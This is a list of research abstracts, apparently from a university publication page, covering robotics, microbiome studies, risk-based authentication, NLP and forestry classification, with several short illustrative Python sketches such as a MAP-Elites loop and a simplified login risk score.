Neuromorphic computing aims to mimic the computational principles of the brain in silico and has motivated research into event-based vision and spiking neural networks (SNNs). Event cameras (ECs) capture local, independent changes in brightness, and offer superior power consumption, response latencies, and dynamic ranges compared to frame-based cameras. SNNs replicate neuronal dynamics observed in biological neurons and propagate information in sparse sequences of "spikes". Apart from biological fidelity, SNNs have demonstrated potential as an alternative to conventional artificial neural networks (ANNs), such as in reducing energy expenditure and inference time in visual classification. Although potentially beneficial for robotics, the novel event-driven and spike-based paradigms remain scarcely explored outside the domain of aerial robots.
To investigate the utility of brain-inspired sensing and data processing in a robotics application, we developed a neuromorphic approach to real-time, online obstacle avoidance on a manipulator with an onboard camera. Our approach adapts high-level trajectory plans with reactive maneuvers by processing emulated event data in a convolutional SNN, decoding neural activations into avoidance motions, and adjusting plans in a dynamic motion primitive formulation. We conducted simulated and real experiments with a Kinova Gen3 arm performing simple reaching tasks involving static and dynamic obstacles. Our implementation was systematically tuned, validated, and tested in sets of distinct task scenarios, and compared to a non-adaptive baseline through formalized quantitative metrics and qualitative criteria.
The neuromorphic implementation facilitated reliable avoidance of imminent collisions in most scenarios, with 84% and 92% median success rates in simulated and real experiments, where the baseline consistently failed. Adapted trajectories were qualitatively similar to baseline trajectories, indicating low impacts on safety, predictability and smoothness criteria. Among notable properties of the SNN were the correlation of processing time with the magnitude of perceived motions (captured in events) and robustness to different event emulation methods. Preliminary tests with a DAVIS346 EC showed similar performance, validating our experimental event emulation method. These results motivate future efforts to incorporate SNN learning, utilize neuromorphic processors, and target other robot tasks to further explore this approach.
Skill generalisation and experience acquisition for predicting and avoiding execution failures
(2023)
For performing tasks in their target environments, autonomous robots usually execute and combine skills. Robot skills in general and learning-based skills in particular are usually designed so that flexible skill acquisition is possible, but without an explicit consideration of execution failures, the impact that failure analysis can have on the skill learning process, or the benefits of introspection for effective coexistence with humans. Particularly in human-centered environments, the ability to understand, explain, and appropriately react to failures can affect a robot's trustworthiness and, consequently, its overall acceptability. Thus, in this dissertation, we study the questions of how parameterised skills can be designed so that execution-level decisions are associated with semantic knowledge about the execution process, and how such knowledge can be utilised for avoiding and analysing execution failures. The first major segment of this work is dedicated to developing a representation for skill parameterisation whose objective is to improve the transparency of the skill parameterisation process and enable a semantic analysis of execution failures. We particularly develop a hybrid learning-based representation for parameterising skills, called an execution model, which combines qualitative success preconditions with a function that maps parameters to predicted execution success. The second major part of this work focuses on applications of the execution model representation to address different types of execution failures. We first present a diagnosis algorithm that, given parameters that have resulted in a failure, finds a failure hypothesis by searching for violations of the qualitative model, as well as an experience correction algorithm that uses the found hypothesis to identify parameters that are likely to correct the failure. 
Furthermore, we present an extension of execution models that allows multiple qualitative execution contexts to be considered so that context-specific execution failures can be avoided. Finally, to enable the avoidance of model generalisation failures, we propose an adaptive ontology-assisted strategy for execution model generalisation between object categories that aims to combine the benefits of model-based and data-driven methods; for this, information about category similarities as encoded in an ontology is integrated with outcomes of model generalisation attempts performed by a robot. The proposed methods are exemplified in terms of various use cases - object and handle grasping, object stowing, pulling, and hand-over - and evaluated in multiple experiments performed with a physical robot. The main contributions of this work include a formalisation of the skill parameterisation problem by considering execution failures as an integral part of the skill design and learning process, a demonstration of how a hybrid representation for parameterising skills can contribute towards improving the introspective properties of robot skills, as well as an extensive evaluation of the proposed methods in various experiments. We believe that this work constitutes a small first step towards more failure-aware robots that are suitable to be used in human-centered environments.
Loading of shipping containers for dairy products often includes a press-fit task, which involves manually stacking milk cartons in a container without using pallets or packaging. Automating this task with a mobile manipulator can reduce worker strain, and also enhance the efficiency and safety of the container loading process. This paper proposes an approach called Adaptive Compliant Control with Integrated Failure Recovery (ACCIFR), which enables a mobile manipulator to reliably perform the press-fit task. We base the approach on a demonstration learning-based compliant control framework, into which we integrate a monitoring and failure recovery mechanism for successful task execution. Concretely, we monitor the execution through distance and force feedback, detect collisions while the robot is performing the press-fit task, and use wrench measurements to classify the direction of collision; this information informs the subsequent recovery process. We evaluate the method on a miniature container setup, considering variations in the (i) starting position of the end effector, (ii) goal configuration, and (iii) object grasping position. The results demonstrate that the proposed approach outperforms the baseline demonstration-based learning framework regarding adaptability to environmental variations and the ability to recover from collision failures, making it a promising solution for practical press-fit applications.
In the design of robot skills, the focus generally lies on increasing the flexibility and reliability of the robot execution process; however, typical skill representations are not designed for analysing execution failures if they occur or for explicitly learning from failures. In this paper, we describe a learning-based hybrid representation for skill parameterisation called an execution model, which considers execution failures to be a natural part of the execution process. We then (i) demonstrate how execution contexts can be included in execution models, (ii) introduce a technique for generalising models between object categories by combining generalisation attempts performed by a robot with knowledge about object similarities represented in an ontology, and (iii) describe a procedure that uses an execution model for identifying a likely hypothesis of a parameterisation failure. The feasibility of the proposed methods is evaluated in multiple experiments performed with a physical robot in the context of handle grasping, object grasping, and object pulling. The experimental results suggest that execution models contribute towards avoiding execution failures, but also represent a first step towards more introspective robots that are able to analyse some of their execution failures in an explicit manner.
Saliency methods are frequently used to explain deep neural network-based models. Adebayo et al.'s work on evaluating saliency methods for classification models illustrates that certain explanation methods fail the model and data randomization tests. However, by extending these tests to various state-of-the-art object detectors, we show that the ability to explain a model depends more on the model itself than on the explanation method. We perform sanity checks for object detection and define new qualitative criteria to evaluate saliency explanations, both for object classification and bounding box decisions, using Guided Backpropagation, Integrated Gradients, and their SmoothGrad versions, together with Faster R-CNN, SSD, and EfficientDet-D0, trained on COCO. In addition, the sensitivity of an explanation method to model parameters and data labels varies class-wise, motivating the sanity checks to be performed for each class. We find that EfficientDet-D0 is the most interpretable model independent of the saliency method, passing the sanity checks with few problems.
The representation, or encoding, utilized in evolutionary algorithms has a substantial effect on their performance. Examination of the suitability of widely used representations for quality diversity optimization (QD) in robotic domains has yielded inconsistent results regarding the most appropriate encoding method. Given the domain-dependent nature of QD, additional evidence from other domains is necessary. This study compares the impact of several representations, including direct encoding, a dictionary-based representation, parametric encoding, compositional pattern producing networks, and cellular automata, on the generation of voxelized meshes in an architecture setting. The results reveal that some indirect encodings outperform direct encodings and can generate more diverse solution sets, especially when considering full phenotypic diversity. The paper introduces a multi-encoding QD approach that incorporates all evaluated representations in the same archive. Species of encodings compete on the basis of phenotypic features, leading to an approach that demonstrates similar performance to the best single-encoding QD approach. This is noteworthy, as it does not always require the contribution of the best-performing single encoding.
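The quality diversity optimization that the encodings above feed into can be sketched as a minimal single-encoding MAP-Elites loop (an illustrative toy with an assumed one-dimensional feature descriptor, not the paper's multi-encoding archive):

```python
import random

def map_elites(evaluate, mutate, random_genome, n_iters=5000, bins=10):
    """Minimal MAP-Elites sketch: each archive cell keeps the best
    (elite) solution whose phenotypic feature falls into that cell.
    `evaluate` returns (fitness, feature) with feature in [0, 1)."""
    archive = {}  # cell index -> (fitness, genome)
    for _ in range(n_iters):
        genome = (mutate(random.choice(list(archive.values()))[1])
                  if archive else random_genome())
        fitness, feature = evaluate(genome)
        cell = min(int(feature * bins), bins - 1)
        if cell not in archive or fitness > archive[cell][0]:
            archive[cell] = (fitness, genome)  # replace a weaker elite
    return archive

# Toy problem: the genome is a single float; fitness rewards closeness
# to 0.5, and the feature descriptor is the genome value itself.
result = map_elites(
    evaluate=lambda g: (-abs(g - 0.5), g),
    mutate=lambda g: min(max(g + random.gauss(0, 0.1), 0.0), 0.999),
    random_genome=lambda: random.random(),
)
print(len(result))  # number of filled cells (at most 10)
```

In the multi-encoding variant the abstract describes, genomes of different encodings would compete for the same phenotype-indexed cells; here a single encoding stands in for simplicity.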
The non-filarial and non-communicable disease podoconiosis affects around 4 million people and is characterized by severe leg lymphedema accompanied by painful intermittent acute inflammatory episodes, called acute dermatolymphangioadenitis (ADLA) attacks. Risk factors have been associated with the disease, but the mechanisms of pathophysiology remain uncertain. Lymphedema can lead to skin lesions, which can serve as entry points for bacteria that may cause ADLA attacks leading to progression of the lymphedema. However, the microbiome of the skin of affected legs from podoconiosis individuals remains unclear. Thus, we analysed the skin microbiome of podoconiosis legs using next generation sequencing. We revealed a positive correlation between increasing lymphedema severity and non-commensal anaerobic bacteria, especially Anaerococcus provencensis, as well as a negative correlation with the presence of Corynebacterium, a constituent of normal skin flora. Disease symptoms were generally linked to higher microbial diversity and richness, which deviated from the normal composition of the skin. These findings show an association of distinct bacterial taxa with lymphedema stages, highlighting the important role of bacteria for the pathogenesis of podoconiosis, and might enable a selection of better treatment regimens to manage ADLA attacks and disease progression.
In the project EILD.nrw, Open Educational Resources (OER) have been developed for teaching databases. Lecturers can use the tools and courses in a variety of learning scenarios. Students of computer science and application subjects can learn the complete life cycle of databases. For this purpose, quizzes, interactive tools, instructional videos, and courses for learning management systems are developed and published under a Creative Commons license. We give an overview of the developed OERs according to subject, description, teaching form, and format. Subsequently, we describe how licensing, sustainability, accessibility, contextualization, content description, and technical adaptability are implemented. The feedback of students in ongoing classes is evaluated.
The perceptual upright results from the multisensory integration of the directions indicated by vision and gravity as well as a prior assumption that upright is towards the head. The direction of gravity is signalled by multiple cues, the predominant of which are the otoliths of the vestibular system and somatosensory information from contact with the support surface. Here, we used neutral buoyancy to remove somatosensory information while retaining vestibular cues, thus "splitting the gravity vector" leaving only the vestibular component. In this way, neutral buoyancy can be used as a microgravity analogue. We assessed spatial orientation using the oriented character recognition test (OChaRT, which yields the perceptual upright, PU) under both neutrally buoyant and terrestrial conditions. The effect of visual cues to upright (the visual effect) was reduced under neutral buoyancy compared to on land but the influence of gravity was unaffected. We found no significant change in the relative weighting of vision, gravity, or body cues, in contrast to results found both in long-duration microgravity and during head-down bed rest. These results indicate a relatively minor role for somatosensation in determining the perceptual upright in the presence of vestibular cues. Short-duration neutral buoyancy is a weak analogue for microgravity exposure in terms of its perceptual consequences compared to long-duration head-down bed rest.
Indoor spaces exhibit microbial compositions that are distinctly dissimilar from one another and from outdoor spaces. Unique in this regard, and a topic that has only recently come into focus, is the microbiome of hospitals. While knowing exactly which microorganisms propagate how and where in hospitals is undoubtedly beneficial for preventing hospital-acquired infections, there are, to date, no standardized procedures for how to best study the hospital microbiome. Our study aimed to investigate the microbiome of hospital sanitary facilities, outlining the extent to which hospital microbiome analyses differ according to sample-preparation protocol. For this purpose, fifty samples were collected from two separate hospitals (three wards and one hospital laboratory), using two different storage media, from which DNA was extracted using two different extraction kits and sequenced with two different primer pairs (V1–V2 and V3–V4). There were no observable differences between the sample-preservation media, small differences in detected taxa between the DNA extraction kits (mainly concerning Propionibacteriaceae), and large differences in detected taxa between the two primer pairs V1–V2 and V3–V4. This analysis also showed that microbial occurrences and compositions can vary greatly from toilets to sinks to showers and across wards and hospitals. In surgical wards, patient toilets appeared to be characterized by lower species richness and diversity than staff toilets. Which sampling sites are best suited for which assessments should be analyzed in more depth. The fact that the sample processing methods we investigated (apart from the choice of primers) seem to have changed the results only slightly suggests that comparing hospital microbiome studies is a realistic option.
The observed differences in species richness and diversity between patient and staff toilets should be further investigated, as these, if confirmed, could be a result of excreted antimicrobials.
Microbiome analyses are essential for understanding microorganism composition and diversity, but interpretation is often challenging due to biological and technical variables. DNA extraction is a critical step that can significantly bias results, particularly in samples containing a high abundance of challenging-to-lyse microorganisms. Taking into consideration the distinctive microenvironments observed in different bodily locations, our study sought to assess the extent of bias introduced by suboptimal bead-beating during DNA extraction across diverse clinical sample types. The question was whether complex targeted extraction methods are always necessary for reliable taxonomic abundance estimation through amplicon sequencing or if simpler alternatives are effective for some sample types. Hence, for four different clinical sample types (stool, cervical swab, skin swab, and hospital surface swab samples), we compared the results achieved with the targeted manual extraction protocols routinely used in our research lab for each sample type against automated protocols not specifically designed for that purpose. Unsurprisingly, we found that for the stool samples, manual extraction protocols with vigorous bead-beating were necessary in order to avoid erroneous taxa proportions on all investigated taxonomic levels and, in particular, false under- or overrepresentation of important genera such as Blautia, Faecalibacterium, and Parabacteroides. However, interestingly, we found that the skin and cervical swab samples yielded similar results with all tested protocols. Our results suggest that the practical level of automation largely depends on the expected microenvironment, with skin and cervical swabs being much easier to process than stool samples. Prudent consideration is necessary when extending the conclusions of this study to applications beyond rough estimations of taxonomic abundance.
PURPOSE
Cervical cancer (CC) is caused by a persistent high-risk human papillomavirus (hrHPV) infection. The cervico-vaginal microbiome may influence the development of (pre)cancer lesions. Aim of the study was (i) to evaluate the new CC screening program in Germany for the detection of high-grade CC precursor lesions, and (ii) to elucidate the role of the cervico-vaginal microbiome and its potential impact on cervical dysplasia.
METHODS
The microbiome of 310 patients referred to colposcopy was determined by amplicon sequencing and correlated with clinicopathological parameters.
RESULTS
Most patients were referred for colposcopy due to a positive hrHPV result in two consecutive years combined with a normal PAP smear. In 2.1% of these cases, a CIN III lesion was detected. There was a significant positive association between the PAP stage and Lactobacillus vaginalis colonization and between the severity of CC precursor lesions and Ureaplasma parvum.
CONCLUSION
In our cohort, the new cervical cancer screening program resulted in a low rate of additionally detected CIN III. It is questionable whether these cases were merely identified earlier through the additional HPV testing, before the appearance of cytological abnormalities, or whether the new screening program will truly increase the detection rate of CIN III in the long run. Colonization with U. parvum was associated with histological dysplastic lesions. Whether targeted therapy of this pathogen or optimization of the microbiome prevents dysplasia remains speculative.
This research investigates the efficacy of multisensory cues for locating targets in Augmented Reality (AR). Sensory constraints can impair perception and attention in AR, leading to reduced performance due to factors such as conflicting visual cues or a restricted field of view. To address these limitations, the research proposes head-based multisensory guidance methods that leverage audio-tactile cues to direct users' attention towards target locations. The research findings demonstrate that this approach can effectively reduce the influence of sensory constraints, resulting in improved search performance in AR. Additionally, the thesis discusses the limitations of the proposed methods and provides recommendations for future research.
Digital ecosystems are driving the digital transformation of business models. Meanwhile, the associated processing of personal data within these complex systems poses challenges to the protection of individual privacy. In this paper, we explore these challenges from the perspective of digital ecosystems' platform providers. To this end, we present the results of an interview study with seven data protection officers representing a total of 12 digital ecosystems in Germany. We identified current and future challenges for the implementation of data protection requirements, covering issues on legal obligations and data subject rights. Our results support stakeholders involved in the implementation of privacy protection measures in digital ecosystems, and form the foundation for future privacy-related studies tailored to the specifics of digital ecosystems.
A company's financial documents use tables along with text to organize data containing key performance indicators (KPIs) (such as profit and loss) and the financial quantities linked to them. A KPI's linked quantity in a table might not equal the quantity of a similarly described KPI in the text. Auditors spend substantial time manually checking for such financial mistakes, a process called consistency checking. In contrast to existing work, this paper attempts to automate this task with the help of transformer-based models. Furthermore, for consistency checking it is essential that the table KPIs' embeddings encode the semantic knowledge of the KPIs and the structural knowledge of the table. Therefore, this paper proposes a pipeline that uses a tabular model to obtain the table KPIs' embeddings. The pipeline takes table and text KPIs as input, generates their embeddings, and then checks whether these KPIs are identical. The pipeline is evaluated on financial documents in the German language, and a comparative analysis of the quality of the cell embeddings from the three tabular models is also presented. In the evaluation, the experiment that used the English-translated text and table KPIs and the Tabbie model to generate the table KPIs' embeddings achieved an accuracy of 72.81% on the consistency checking task, outperforming the benchmark and the other tabular models.
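The matching step of such a pipeline can be illustrated with a minimal embedding-similarity sketch (the cosine threshold and function name are assumptions for illustration, not the paper's trained classifier):

```python
import numpy as np

def consistent(table_kpi_emb, text_kpi_emb, threshold=0.8):
    """Flag a table/text KPI pair as referring to the same indicator
    when their embeddings are close in cosine similarity.
    The 0.8 threshold is purely illustrative."""
    a = np.asarray(table_kpi_emb, dtype=float)
    b = np.asarray(text_kpi_emb, dtype=float)
    cos = a @ b / (np.linalg.norm(a) * np.linalg.norm(b))
    return cos >= threshold

# Identical embeddings are trivially matched ...
print(consistent([1.0, 2.0, 3.0], [1.0, 2.0, 3.0]))  # True
# ... while an orthogonal pair is not.
print(consistent([1.0, 0.0], [0.0, 1.0]))            # False
```

Once a table KPI and a text KPI are matched, their linked quantities can be compared directly to detect an inconsistency.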
Quality diversity algorithms can be used to efficiently create a diverse set of solutions to inform engineers' intuition. But quality diversity is not efficient for very expensive problems, needing hundreds of thousands of evaluations. Even with the assistance of surrogate models, quality diversity needs hundreds or even thousands of evaluations, which can make its use infeasible. In this study we tackle this problem by using a pre-optimization strategy on a lower-dimensional optimization problem and then mapping the solutions to a higher-dimensional case. For a use case of designing buildings that minimize wind nuisance, we show that we can predict flow features around 3D buildings from 2D flow features around building footprints. For a diverse set of building designs, by sampling the space of 2D footprints with a quality diversity algorithm, a predictive model can be trained that is more accurate than when trained on a set of footprints selected with a space-filling algorithm like the Sobol sequence. Simulating only 16 buildings in 3D, a set of 1024 building designs with low predicted wind nuisance is created. We show that we can produce better machine learning models by generating training data with quality diversity instead of using common sampling techniques. The method can bootstrap generative design in a computationally expensive 3D domain and allows engineers to sweep the design space, understanding wind nuisance in early design phases.
Risk-based authentication (RBA) aims to protect users against attacks involving stolen passwords. RBA monitors features during login and requests re-authentication when the feature values differ widely from those previously observed. It is recommended by various national security organizations, and users perceive it as more usable than, and equally secure to, equivalent two-factor authentication. Despite that, RBA is still used by very few online services. Reasons for this include a lack of validated open resources on RBA properties, implementation, and configuration. This effectively hinders RBA research, development, and adoption.
To close this gap, we provide the first long-term RBA analysis on a real-world large-scale online service. We collected feature data of 3.3 million users and 31.3 million login attempts over more than 1 year. Based on the data, we provide (i) studies on RBA’s real-world characteristics plus its configurations and enhancements to balance usability, security, and privacy; (ii) a machine learning–based RBA parameter optimization method to support administrators finding an optimal configuration for their own use case scenario; (iii) an evaluation of the round-trip time feature’s potential to replace the IP address for enhanced user privacy; and (iv) a synthesized RBA dataset to reproduce this research and to foster future RBA research. Our results provide insights on selecting an optimized RBA configuration so that users profit from RBA after just a few logins. The open dataset enables researchers to study, test, and improve RBA for widespread deployment in the wild.
Risk-Based Authentication for OpenStack: A Fully Functional Implementation and Guiding Example
(2023)
Online services have difficulty replacing passwords with more secure user authentication mechanisms, such as Two-Factor Authentication (2FA). This is partly because users tend to reject such mechanisms in use cases outside of online banking. Relying on password authentication alone, however, is not an option in light of recent attack patterns such as credential stuffing.
Risk-Based Authentication (RBA) can serve as an interim solution to increase password-based account security until better methods are in place. Unfortunately, RBA is currently used by only a few major online services, even though it is recommended by various standards and has been shown to be effective in scientific studies. This paper contributes to the hypothesis that the low adoption of RBA in practice can be due to the complexity of implementing it. We provide an RBA implementation for the open source cloud management software OpenStack, which is the first fully functional open source RBA implementation based on the Freeman et al. algorithm, along with initial reference tests that can serve as a guiding example and blueprint for developers.
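The Freeman et al. algorithm referenced above scores login risk from feature likelihoods. A heavily simplified, illustrative sketch follows (the function names, the additive smoothing, the feature-independence assumption, and the two-feature example data are assumptions for illustration, not the OpenStack implementation):

```python
from collections import Counter

def risk_score(features, user_history, global_history, smoothing=1.0):
    """Illustrative risk score in the spirit of the Freeman et al.
    approach: the likelihood of the observed feature values under a
    global model divided by their likelihood under the legitimate
    user's own login history. Features are treated as independent."""
    risk = 1.0
    for name, value in features.items():
        user_counts = Counter(h[name] for h in user_history)
        glob_counts = Counter(h[name] for h in global_history)
        n_values = len(glob_counts) + 1  # smoothing over seen values
        p_user = (user_counts[value] + smoothing) / (len(user_history) + smoothing * n_values)
        p_glob = (glob_counts[value] + smoothing) / (len(global_history) + smoothing * n_values)
        risk *= p_glob / p_user
    return risk  # higher -> more suspicious; compare to a threshold

history = [{"country": "DE", "browser": "Firefox"}] * 9 \
        + [{"country": "DE", "browser": "Chrome"}]
glob = history + [{"country": "US", "browser": "Chrome"}] * 5

familiar = risk_score({"country": "DE", "browser": "Firefox"}, history, glob)
unusual = risk_score({"country": "US", "browser": "Chrome"}, history, glob)
print(familiar < unusual)  # a previously unseen country scores higher
```

A deployment would compare the score against thresholds to decide between accepting the login, requesting re-authentication, or blocking the attempt.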
This paper presents the b-it-bots RoboCup@Work team and its current hardware and functional architecture for the KUKA youBot robot. We describe the underlying software framework and the developed capabilities required for operating in industrial environments including features such as reliable and precise navigation, flexible manipulation, robust object recognition and task planning. New developments include an approach to grasp vertical objects, placement of objects by considering the empty space on a workstation, and the process of porting our code to ROS2.
Users should always play a central role in the development of (software) solutions. The human-centered design (HCD) process in the ISO 9241-210 standard proposes a procedure for systematically involving users. However, due to its abstraction level, the HCD process provides little guidance for how it should be implemented in practice. In this chapter, we propose three concrete practical methods that enable the reader to develop usable security and privacy (USP) solutions using the HCD process. This chapter equips the reader with the procedural knowledge and recommendations to: (1) derive mental models with regard to security and privacy, (2) analyze USP needs and privacy-related requirements, and (3) collect user characteristics on privacy and structure them by user group profiles and into privacy personas. Together, these approaches help to design measures for a user-friendly implementation of security and privacy measures based on a firm understanding of the key stakeholders.
The European General Data Protection Regulation requires the implementation of Technical and Organizational Measures (TOMs) to reduce the risk of illegitimate processing of personal data. For these measures to be effective, they must be applied correctly by employees who process personal data under the authority of their organization. However, even data processing employees often have limited knowledge of data protection policies and regulations, which increases the likelihood of misconduct and privacy breaches. To lower the likelihood of unintentional privacy breaches, TOMs must be developed with employees’ needs, capabilities, and usability requirements in mind. To reduce implementation costs and help organizations and IT engineers with the implementation, privacy patterns have proven to be effective for this purpose. In this chapter, we introduce the privacy pattern Data Cart, which specifically helps to develop TOMs for data processing employees. Based on a user-centered design approach with employees from two public organizations in Germany, we present a concept that illustrates how Privacy by Design can be effectively implemented. Organizations, IT engineers, and researchers will gain insight on how to improve the usability of privacy-compliant tools for managing personal data.
TSEM: Temporally-Weighted Spatiotemporal Explainable Neural Network for Multivariate Time Series
(2023)
Forensic DNA profiles are established by multiplex PCR amplification of a set of highly variable short tandem repeat (STR) loci followed by capillary electrophoresis (CE) as a means to assign alleles to PCR products of differential length. Recently, CE analysis of STR amplicons has been supplemented by high-throughput next generation sequencing (NGS) techniques that are able to detect isoalleles bearing sequence polymorphisms and allow for an improved analysis of degraded DNA. Several such assays have been commercialised and validated for forensic applications. However, these systems are cost-effective only when applied to high numbers of samples. We report here an alternative, cost-efficient shallow-sequence output NGS assay called maSTR assay that, in conjunction with a dedicated bioinformatics pipeline called SNiPSTR, can be implemented with standard NGS instrumentation. In a back-to-back comparison with a CE-based, commercial forensic STR kit, we find that for samples with low DNA content, with mixed DNA from different individuals, or containing PCR inhibitors, the maSTR assay performs equally well, and with degraded DNA is superior to CE-based analysis. Thus, the maSTR assay is a simple, robust and cost-efficient NGS-based STR typing method applicable for human identification in forensic and biomedical contexts.
Risk-based authentication (RBA) is an adaptive approach to strengthening password authentication. It monitors a number of features relating to login behaviour during password entry. If the observed feature values differ significantly from those of previous logins, RBA requests additional proof of identity. Government agencies and a US presidential executive order recommend RBA to protect online accounts against attacks involving stolen passwords. Despite these facts, RBA has suffered from a lack of open knowledge: there was little to no research on its usability, security, and privacy. Understanding these aspects, however, is important for broad acceptance.
This thesis aims to provide a comprehensive understanding of RBA through a series of studies. The results make it possible to create privacy-preserving RBA solutions that strengthen authentication while achieving high user acceptance.
Question Answering (QA) has gained significant attention in recent years, with transformer-based models improving natural language processing. However, issues of explainability remain, as it is difficult to determine whether an answer is based on a true fact or a hallucination. Knowledge-based question answering (KBQA) methods can address this problem by retrieving answers from a knowledge graph. This paper proposes a hybrid approach to KBQA called FRED, which combines pattern-based entity retrieval with a transformer-based question encoder. The method uses an evolutionary approach to learn SPARQL patterns, which retrieve candidate entities from a knowledge base. A transformer-based regressor is then trained to estimate each pattern's expected F1 score for answering the question, resulting in a ranking of candidate entities. Unlike other approaches, FRED can attribute results to learned SPARQL patterns, making them more interpretable. The method is evaluated on two datasets and yields MAP scores of up to 73 percent, with the transformer-based interpretation falling only 4 pp short of an oracle run. Additionally, the learned patterns successfully complement manually generated ones and generalize well to novel questions.
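The ranking step described above can be sketched in miniature. Everything below (the two SPARQL patterns, their candidate sets, and the score table standing in for the trained transformer regressor) is hypothetical and only illustrates how per-pattern F1 estimates turn into an entity ranking:

```python
# Hypothetical learned patterns, each mapping a question to candidate entities.
PATTERNS = {
    "?x dbo:author ?ans": {"JaneDoe"},
    "?x dbo:director ?ans": {"JohnRoe"},
}

# Stand-in for the transformer regressor: predicted F1 per pattern.
PREDICTED_F1 = {
    "?x dbo:author ?ans": 0.8,
    "?x dbo:director ?ans": 0.3,
}

def rank_candidates(question, patterns=PATTERNS, scores=PREDICTED_F1):
    """Rank candidate entities by the best predicted F1 of any pattern
    that retrieved them (higher = more likely the correct answer)."""
    best = {}
    for pattern, candidates in patterns.items():
        f1 = scores[pattern]              # regressor estimate for this pattern
        for entity in candidates:
            best[entity] = max(best.get(entity, 0.0), f1)
    return sorted(best, key=best.get, reverse=True)

print(rank_candidates("Who wrote X?"))
```

Because each entity keeps the best score among the patterns that produced it, the ranking remains attributable to a specific learned pattern.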
This paper addresses the classification of Arabic text data in the field of Natural Language Processing (NLP), with a particular focus on Natural Language Inference (NLI) and Contradiction Detection (CD). Arabic is considered a resource-poor language, meaning that there are few data sets available, which leads to limited availability of NLP methods. To overcome this limitation, we create a dedicated data set from publicly available resources. Subsequently, transformer-based machine learning models are being trained and evaluated. We find that a language-specific model (AraBERT) performs competitively with state-of-the-art multilingual approaches, when we apply linguistically informed pre-training methods such as Named Entity Recognition (NER). To our knowledge, this is the first large-scale evaluation for this task in Arabic, as well as the first application of multi-task pre-training in this context.
Airborne and spaceborne platforms are the primary data sources for large-scale forest mapping, but visual interpretation for individual species determination is labor-intensive. Hence, various studies focusing on forests have investigated the benefits of multiple sensors for automated tree species classification. However, transferable deep learning approaches for large-scale applications are still lacking. This gap motivated us to create a novel dataset for tree species classification in central Europe based on multi-sensor data from aerial, Sentinel-1 and Sentinel-2 imagery. In this paper, we introduce the TreeSatAI Benchmark Archive, which contains labels of 20 European tree species (i.e., 15 tree genera) derived from forest administration data of the federal state of Lower Saxony, Germany. We propose models and guidelines for the application of the latest machine learning techniques for the task of tree species classification with multi-label data. Finally, we provide various benchmark experiments with methods including artificial neural networks and tree-based machine learning, showcasing the information which can be derived from the different sensors. We found that residual neural networks (ResNet) perform sufficiently well, with weighted precision scores of up to 79 %, using only the RGB bands of aerial imagery. This result indicates that the spatial content present within the 0.2 m resolution data is very informative for tree species classification. With the incorporation of Sentinel-1 and Sentinel-2 imagery, performance improved only marginally. However, the sole use of Sentinel-2 still allows for weighted precision scores of up to 74 % using either multi-layer perceptron (MLP) or Light Gradient Boosting Machine (LightGBM) models. Since the dataset is derived from real-world reference data, it contains high class imbalances.
We found that this dataset attribute negatively affects the models' performances for many of the underrepresented classes (i.e., scarce tree species). However, the class-wise precision of the best-performing late fusion model still reached values ranging from 54 % (Acer) to 88 % (Pinus). Based on our results, we conclude that deep learning techniques using aerial imagery could considerably support forestry administration in the provision of large-scale tree species maps at a very high resolution to plan for challenges driven by global environmental change. The original dataset used in this paper is shared via Zenodo (https://doi.org/10.5281/zenodo.6598390, Schulz et al., 2022). For citation of the dataset, we refer to this article.
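The weighted precision metric cited above can be sketched as follows: per-class precision is averaged using each class's support (true label count) as its weight. The tiny multi-label matrices below are synthetic, not TreeSatAI data:

```python
import numpy as np

# Synthetic multi-label ground truth and predictions:
# rows = samples, columns = species labels.
y_true = np.array([[1, 0, 1],
                   [0, 1, 1],
                   [1, 1, 0]])
y_pred = np.array([[1, 0, 1],
                   [1, 1, 0],
                   [1, 1, 0]])

def weighted_precision(y_true, y_pred):
    """Support-weighted average of per-class precision."""
    tp = ((y_true == 1) & (y_pred == 1)).sum(axis=0)
    predicted = (y_pred == 1).sum(axis=0)
    support = (y_true == 1).sum(axis=0)          # true count per class
    prec = np.where(predicted > 0, tp / np.maximum(predicted, 1), 0.0)
    return float((prec * support).sum() / support.sum())

print(round(weighted_precision(y_true, y_pred), 3))
```

Weighting by support means frequent species dominate the score, which is why a high weighted precision can coexist with weak performance on the scarce species mentioned above.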
LiDAR-based Indoor Localization with Optimal Particle Filters using Surface Normal Constraints
(2023)
Intelligent virtual agents provide a framework for simulating more life-like behavior and increasing plausibility in virtual training environments. They can improve the learning process if they portray believable behavior that can also be controlled to support the training objectives. In the context of this thesis, cognitive agents are considered a subset of intelligent virtual agents (IVA) with the focus on emulating cognitive processes to achieve believable behavior. The complexity of employed algorithms, however, is often limited since multiple agents need to be simulated in real-time. Available solutions focus on a subset of the indicated aspects: plausibility, controllability, or real-time capability (scalability). Within this thesis project, an agent architecture for attentive cognitive agents is developed that considers all three aspects at once. The result is a lightweight cognitive agent architecture that is customizable to application-specific requirements. A generic trait-based personality model influences all cognitive processes, facilitating the generation of consistent and individual behavior. An additional mapping process provides a formalized mechanism to transfer results of psychological studies to the architecture. Personality profiles are combined with an emotion model to achieve situational behavior adaptation. Which action an agent selects in a situation also influences plausibility. An integral element of this selection process is an agent's knowledge about its world. Therefore, synthetic perception is modeled and integrated into the architecture to provide a credible knowledge base. The developed perception module includes a unified sensor interface, a memory hierarchy, and an attention process. With the presented realization of the architecture (CAARVE), it is possible for the first time to simulate cognitive agents, whose behaviors are simultaneously computable in real-time and controllable. 
The architecture's applicability is demonstrated by integrating an agent-based traffic simulation built with CAARVE into a bicycle simulator for road-safety education. The developed ideas and their realization are evaluated within this work using different strategies and scenarios. For example, it is shown how CAARVE agents utilize personality profiles and emotions to plausibly resolve deadlocks in traffic simulations. Controllability and adaptability are demonstrated in additional scenarios. Using the realization, 200 agents can be simulated in real-time (50 FPS), illustrating scalability. The achieved results verify that the developed architecture can generate plausible and controllable agent behavior in real-time. The presented concepts and realizations provide sound fundamentals to everyone interested in simulating IVA in real-time environments.
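As a rough illustration of how a trait-based personality profile can bias action selection, the following sketch uses invented traits, actions, and weights; the actual CAARVE architecture is far richer, combining personality, emotions, perception, and memory:

```python
def select_action(actions, traits):
    """Pick the action with the highest trait-weighted utility."""
    def utility(action):
        return sum(traits.get(t, 0.0) * w
                   for t, w in action["weights"].items())
    return max(actions, key=utility)["name"]

# Invented actions for a traffic deadlock, each favored by one trait.
ACTIONS = [
    {"name": "yield_way", "weights": {"agreeableness": 1.0}},
    {"name": "push_through", "weights": {"aggressiveness": 1.0}},
]

# Two invented personality profiles resolving the same situation differently.
calm = {"agreeableness": 0.9, "aggressiveness": 0.2}
bold = {"agreeableness": 0.1, "aggressiveness": 0.8}

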